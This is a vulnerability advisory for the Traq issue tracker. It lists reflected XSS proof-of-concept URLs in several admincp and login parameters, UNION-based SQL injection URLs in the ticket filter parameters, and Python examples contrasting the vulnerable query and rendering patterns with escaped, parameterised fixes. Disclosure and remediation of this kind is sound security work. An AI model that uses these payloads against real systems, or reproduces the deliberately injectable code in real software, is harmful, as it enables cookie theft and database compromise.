High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in Traq which could be exploited to perform cross-site scripting (XSS) and SQL injection attacks.
1) Cross-site scripting (XSS) vulnerabilities in Traq

1.1 The vulnerability exists due to insufficient sanitization of the "edit" parameter in admincp/components.php, admincp/ticket_templates.php, admincp/custom_fields.php and admincp/groups.php. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary HTML and script code in the user's browser in the context of the vulnerable website. Successful exploitation requires that the victim is logged in to the application and has access to the administrative interface. The examples below open with %22%3E, which decodes to "> and closes the attribute and tag into which the parameter value is echoed before the script element begins.

Exploitation examples:

http://[host]/admincp/components.php?edit=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://[host]/admincp/ticket_templates.php?edit=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://[host]/admincp/custom_fields.php?edit=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://[host]/admincp/groups.php?edit=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

1.2 The vulnerability exists due to insufficient sanitization of the "errors" parameter in admincp/components.php, admincp/groups.php, admincp/milestones.php, admincp/plugins.php, admincp/projects.php, admincp/repositories.php and admincp/users.php. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary HTML and script code in the user's browser in the context of the vulnerable website. Successful exploitation requires that the victim is logged in to the application and has access to the administrative interface, and that "register_globals" is enabled: with that PHP setting, the query-string array errors[] is imported as a PHP variable that the page then prints unescaped, which is why the requests below pass the payload as errors[] rather than as a normal parameter.

Exploitation examples:

http://[host]/admincp/components.php?edit&error&errors[]=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://[host]/admincp/groups.php?edit&errors[]=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://[host]/admincp/milestones.php?edit&errors[]=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://[host]/admincp/plugins.php?create&errors[]=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://[host]/admincp/projects.php?edit&errors[]=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://[host]/admincp/repositories.php?edit&errors[]=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://[host]/admincp/users.php?edit&errors[]=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

1.3 The vulnerability exists due to insufficient sanitization of the "goto" parameter in user/login. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary HTML and script code in the user's browser in the context of the vulnerable website.

Exploitation example:

http://[host]/user/login?goto=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
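The two rendering patterns behind 1.1 and 1.2, run against the advisory's own exploit URLs, as an added example that is not Traq's code. The HTML templates are constructed stand-ins for the admincp pages (the real source is not quoted on this page); the URL decoding and the escaping fix are the point.

```python
"""Added example, not Traq's code: a stand-in for the two rendering patterns
described in 1.1 and 1.2, run against the advisory's own exploit URLs.

The HTML templates are constructed for this example; the real admincp pages
are not quoted on the page."""
from html import escape
from urllib.parse import unquote


def query_params(url):
    """Split the query string of an exploit URL into name -> [values].

    Written by hand rather than with urllib.parse.parse_qs so that the ';'
    inside the payload and the '[host]' placeholder in the URL are handled
    the same way on every Python version."""
    params = {}
    query = url.split("?", 1)[1] if "?" in url else ""
    for pair in query.split("&"):
        if not pair:
            continue
        name, _, value = pair.partition("=")
        params.setdefault(unquote(name), []).append(unquote(value))
    return params


# 1.1: the "edit" value is echoed inside an attribute.  The payload's leading
# %22%3E decodes to ">, which closes the attribute and the tag, so the
# <script> that follows is parsed as markup.
def vulnerable_edit_form(edit):
    return f'<input type="hidden" name="edit" value="{edit}">'


def safe_edit_form(edit):
    # quote=True also encodes ", so the attribute cannot be closed early.
    return f'<input type="hidden" name="edit" value="{escape(edit, quote=True)}">'


# 1.2: with register_globals=On, the query string errors[]=... is imported
# as a PHP array that the page prints item by item.
def vulnerable_error_list(errors):
    return "<ul>" + "".join(f"<li>{e}</li>" for e in errors) + "</ul>"


def safe_error_list(errors):
    return "<ul>" + "".join(f"<li>{escape(e)}</li>" for e in errors) + "</ul>"


def reflects_script(html):
    """True if a <script> element survives into the rendered page."""
    return "<script>" in html.lower()


# Exploit URLs taken from the advisory (placeholders left as written).
EDIT_URL = ("http://[host]/admincp/components.php?edit="
            "%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E")
ERRORS_URL = ("http://[host]/admincp/groups.php?edit&errors[]="
              "%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E")


def demo():
    """Decode both payloads and render them through both template variants."""
    edit = query_params(EDIT_URL)["edit"][0]
    errors = query_params(ERRORS_URL)["errors[]"]
    return {
        "edit_payload": edit,
        "edit_vulnerable": reflects_script(vulnerable_edit_form(edit)),
        "edit_safe": reflects_script(safe_edit_form(edit)),
        "errors_vulnerable": reflects_script(vulnerable_error_list(errors)),
        "errors_safe": reflects_script(safe_error_list(errors)),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The same attribute-context escaping applies to the "goto" value in 1.3; whatever the page echoes into an attribute must be passed through an encoder that handles the quote character, not only the angle brackets.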
2) SQL injection vulnerabilities in Traq

The vulnerability exists due to insufficient sanitization of the "sort", "order", "component", "milestone", "priority", "severity", "status", "type" and "version" parameters. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary SQL commands in the application's database. Successful exploitation may allow an attacker to read, modify, add or delete arbitrary data in the database.

In the examples below, %29 ( ) ) closes the list the filter value lands in, the UNION SELECT supplies the same number of columns as the original query, version%28%29 (version()) places the database version in the result, and the trailing where 1 in (1 leaves an open parenthesis for the original query's closing one; the /**/ comment sequences stand in for spaces. For the "sort" and "order" parameters, which select a column and a direction, the injected value cannot be replaced by a bound parameter, so the fix is a fixed allowlist of accepted values; the value filters should be passed as bound parameters.

Exploitation examples:

http://[host]/[PROJECT_ID]/tickets?sort=SQL_CODE_HERE
http://[host]/[PROJECT_ID]/tickets?order=SQL_CODE_HERE
http://[host]/[PROJECT_ID]/tickets?columns=ticket&component=1%29/**/union/**/select/**/1,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,29,20/**/from/**/traq_tickets/**/where/**/1/**/in/**/%281
http://[host]/[PROJECT_ID]/tickets?columns=ticket&milestone=1%29/**/union/**/select/**/1,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,29,20/**/from/**/traq_tickets/**/where/**/1/**/in/**/%281
http://[host]/[PROJECT_ID]/tickets?columns=ticket&priority=1%29/**/union/**/select/**/1,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,29,20/**/from/**/traq_tickets/**/where/**/1/**/in/**/%281
http://[host]/[PROJECT_ID]/tickets?columns=ticket&severity=1%29/**/union/**/select/**/1,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,29,20/**/from/**/traq_tickets/**/where/**/1/**/in/**/%281
http://[host]/[PROJECT_ID]/tickets?columns=ticket&status=1%29/**/union/**/select/**/1,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,29,20/**/from/**/traq_tickets/**/where/**/1/**/in/**/%281
http://[host]/[PROJECT_ID]/tickets?columns=ticket&type=1%29/**/union/**/select/**/1,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,29,20/**/from/**/traq_tickets/**/where/**/1/**/in/**/%281
http://[host]/[PROJECT_ID]/tickets?columns=ticket&version=1%29/**/union/**/select/**/1,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,29,20/**/from/**/traq_tickets/**/where/**/1/**/in/**/%281
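Why the filter parameters are injectable and how the same query is built safely, as an added example that is not Traq's code. The table is a constructed four-column SQLite stand-in for traq_tickets (the real schema has more columns, which is why the advisory's UNION lists 20 values), and SQLite's sqlite_version() replaces the version() call in the advisory's payload.

```python
"""Added example, not Traq's code: the injectable query shape behind the
tickets filters, next to a hardened version of the same query.

Constructed assumptions: a four-column SQLite table named traq_tickets and
sqlite_version() in place of the version() call in the advisory's payload."""
import sqlite3

# Identifiers cannot be bound as parameters, so column names and the sort
# direction are validated against a fixed allowlist instead.
COLUMNS = ("id", "summary", "component", "status")
DIRECTIONS = ("ASC", "DESC")


def make_db():
    """Constructed sample data, not taken from any real Traq install."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE traq_tickets "
               "(id INTEGER, summary TEXT, component INTEGER, status INTEGER)")
    db.executemany("INSERT INTO traq_tickets VALUES (?, ?, ?, ?)",
                   [(1, "login broken", 1, 1), (2, "typo", 2, 1), (3, "crash", 1, 2)])
    return db


def vulnerable_tickets(db, component="1", sort="id", order="ASC"):
    """The bug class from the advisory: every parameter is concatenated."""
    sql = ("SELECT id, summary, component, status FROM traq_tickets "
           f"WHERE component IN ({component}) ORDER BY {sort} {order}")
    return db.execute(sql).fetchall()


def safe_tickets(db, component="1", sort="id", order="ASC"):
    """Values go through placeholders; identifiers go through the allowlist."""
    if sort not in COLUMNS or order.upper() not in DIRECTIONS:
        raise ValueError("unexpected sort/order")
    # int() rejects anything that is not a plain number, including the
    # UNION payload below; a comma-separated list of ids is still accepted.
    ids = [int(x) for x in component.split(",")]
    placeholders = ", ".join("?" * len(ids))
    sql = ("SELECT id, summary, component, status FROM traq_tickets "
           f"WHERE component IN ({placeholders}) ORDER BY {sort} {order.upper()}")
    return db.execute(sql, ids).fetchall()


# The advisory's component= payload after URL decoding (%29 -> ')',
# %28 -> '('), with /**/ kept as the space substitute and the column list
# shortened to match the four-column table used here.
UNION_PAYLOAD = ("1)/**/union/**/select/**/1,sqlite_version(),3,4"
                 "/**/from/**/traq_tickets/**/where/**/1/**/in/**/(1")


def leaks_version(db):
    """True if the concatenated query returns the database version string."""
    rows = vulnerable_tickets(db, component=UNION_PAYLOAD)
    return sqlite3.sqlite_version in [row[1] for row in rows]


def is_rejected(db, **kwargs):
    """True if the hardened builder refuses the given parameters."""
    try:
        safe_tickets(db, **kwargs)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    print("vulnerable query leaks version:", leaks_version(db))
    print("hardened query rejects payload:", is_rejected(db, component=UNION_PAYLOAD))
    print("hardened query, component=1:", safe_tickets(db, component="1"))
```

The allowlist for sort and order is the part most often skipped: an ORDER BY clause accepts arbitrary expressions, so validating the value against the column names the page actually offers is the only way to keep an attacker's SQL out of it.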